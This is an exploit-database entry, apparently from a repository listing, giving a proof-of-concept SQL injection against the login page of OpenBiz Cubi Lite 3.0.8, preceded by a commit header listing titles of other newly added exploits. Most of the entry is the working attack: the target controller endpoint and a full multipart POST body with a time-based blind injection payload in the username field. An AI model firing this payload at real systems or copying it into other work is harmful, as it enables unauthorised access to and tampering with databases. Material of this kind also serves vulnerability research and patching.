11366ca935
18 changes to exploits/shellcodes FaceTime - RTP Video Processing Heap Corruption FaceTime - 'readSPSandGetDecoderParams' Stack Corruption FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption Blue Server 1.1 - Denial of Service (PoC) eToolz 3.4.8.0 - Denial of Service (PoC) VSAXESS V2.6.2.70 build20171226_053 - 'organization' Denial of Service (PoC) Arm Whois 3.11 - Buffer Overflow (SEH) libiec61850 1.3 - Stack Based Buffer Overflow Morris Worm - sendmail Debug Mode Shell Escape (Metasploit) blueimp's jQuery 9.22.0 - (Arbitrary) File Upload (Metasploit) Morris Worm - fingerd Stack Buffer Overflow (Metasploit) PHP Proxy 3.0.3 - Local File Inclusion Voovi Social Networking Script 1.0 - 'user' SQL Injection CMS Made Simple 2.2.7 - Remote Code Execution OOP CMS BLOG 1.0 - Cross-Site Request Forgery (Add Admin) Grocery crud 1.6.1 - 'search_field' SQL Injection OOP CMS BLOG 1.0 - 'search' SQL Injection OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection LibreHealth 2.0.0 - Arbitrary File Actions
54 lines
No EOL
1.9 KiB
Text
54 lines
No EOL
1.9 KiB
Text
# Exploit Title: OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection
|
|
# Date: ]2018-11-05
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Contact: https://pentest.com.tr
|
|
# Vendor Homepage: https://sourceforge.net/projects/bigchef/
|
|
# Software Link: https://sourceforge.net/projects/bigchef/files/latest/download
|
|
# Version: v3.0.8
|
|
# Category: Webapps
|
|
# Tested on: XAMPP for Linux 1.7.2
|
|
# Description: Cubi Platform login page is prone to an SQL-injection vulnerability.
|
|
# Exploiting this issue could allow an attacker to compromise the application,
|
|
# access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
#########################################################
|
|
# PoC : SQLi :
|
|
|
|
# POST : POST
|
|
/bin/controller.php?F=RPCInvoke&P0=[user.form.LoginForm]&P1=[Login]&__this=btn_login:onclick&_thisView=user.view.LoginView&jsrs=1
|
|
# Parameter: MULTIPART username ((custom) POST)
|
|
Type: AND/OR time-based blind
|
|
Title: MySQL >= 5.0.12 AND time-based blind
|
|
|
|
|
|
# Payload:
|
|
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="username"
|
|
|
|
admin' AND SLEEP(5)-- JgaK
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="password"
|
|
|
|
password
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="session_timeout"
|
|
|
|
Don't save session
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="session_timeout"
|
|
|
|
0
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="current_language"
|
|
|
|
English ( en_US )
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="current_language"
|
|
|
|
en_US
|
|
-----------------------------71911072106778878648823492
|
|
Content-Disposition: form-data; name="btn_client_login"
|
|
|
|
|
|
-----------------------------71911072106778878648823492--
|
|
--- |